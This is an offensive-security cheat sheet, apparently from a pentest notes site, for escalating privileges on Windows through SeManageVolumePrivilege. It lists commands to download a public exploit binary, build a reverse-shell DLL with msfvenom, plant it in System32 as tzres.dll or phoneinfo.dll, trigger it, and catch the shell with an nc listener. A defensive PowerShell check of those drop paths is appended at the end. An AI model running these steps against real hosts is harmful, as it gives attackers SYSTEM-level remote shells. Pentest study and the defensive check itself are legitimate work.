SeManageVolumePrivilege

https://hackfa.st/Offensive-Security/Windows-Environment/Privilege-Escalation/Token-Impersonation/SeManageVolumePrivilege/

Download the EnableAllTokenPrivs.ps1 script and enable all token privileges

wget https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

Import-Module .\EnableAllTokenPrivs.ps1

whoami /priv

DLL hijack with Metasploit

wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe

.\SeManageVolumeExploit.exe



msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=1337 -f dll -o tzres.dll

copy tzres.dll C:\Windows\System32\wbem\

systeminfo 



rlwrap -cAr nc -lnvp 1337

WerTrigger

Copy phoneinfo.dll to C:\Windows\System32\

Place Report.wer and WerTrigger.exe in the same directory, then run WerTrigger.exe

WerTrigger.exe produces no output; it waits for instructions
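
Defensive check for the two DLL drop paths used above (an added example, not part of the original page): it reports any file present at those paths with its Authenticode status, owner and creation time, and any unexpected principal allowed to create files in the parent directories. The $expectedWriters baseline is an assumption to adjust per environment.

```powershell
# Added defensive example; not part of the original page.
# The two DLL drop locations named in the steps above.
$dropPaths = @(
    "$env:SystemRoot\System32\wbem\tzres.dll",
    "$env:SystemRoot\System32\phoneinfo.dll"
)
# Assumption: principals allowed to create files under System32 in your baseline.
$expectedWriters = @(
    'NT SERVICE\TrustedInstaller', 'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators', 'CREATOR OWNER'
)
$createFiles = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles
$genericMask = 0x50000000   # GENERIC_WRITE (0x40000000) | GENERIC_ALL (0x10000000)

$findings = foreach ($path in $dropPaths) {
    # 1. A file at a drop location: record signer, owner and creation time for triage.
    if (Test-Path -LiteralPath $path -PathType Leaf) {
        $item = Get-Item -LiteralPath $path -Force
        $sig  = Get-AuthenticodeSignature -LiteralPath $path
        [pscustomobject]@{
            Check  = 'FilePresent'
            Path   = $path
            Detail = 'Signature={0}; Signer={1}; Owner={2}; CreatedUtc={3:o}' -f
                     $sig.Status, $sig.SignerCertificate.Subject,
                     (Get-Acl -LiteralPath $path).Owner, $item.CreationTimeUtc
        }
    }
    # 2. An unexpected principal allowed to create files in the parent directory.
    $dir = Split-Path -Parent $path
    foreach ($ace in (Get-Acl -LiteralPath $dir).Access) {
        $rights   = [int]$ace.FileSystemRights
        $canWrite = (($rights -band $createFiles) -ne 0) -or (($rights -band $genericMask) -ne 0)
        if ($ace.AccessControlType -eq 'Allow' -and $canWrite -and
            $expectedWriters -notcontains $ace.IdentityReference.Value) {
            [pscustomobject]@{
                Check  = 'UnexpectedWriter'
                Path   = $dir
                Detail = '{0} has {1}' -f $ace.IdentityReference.Value, $ace.FileSystemRights
            }
        }
    }
}

if ($findings) { $findings | Format-List } else { 'No findings for the checked paths.' }
```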
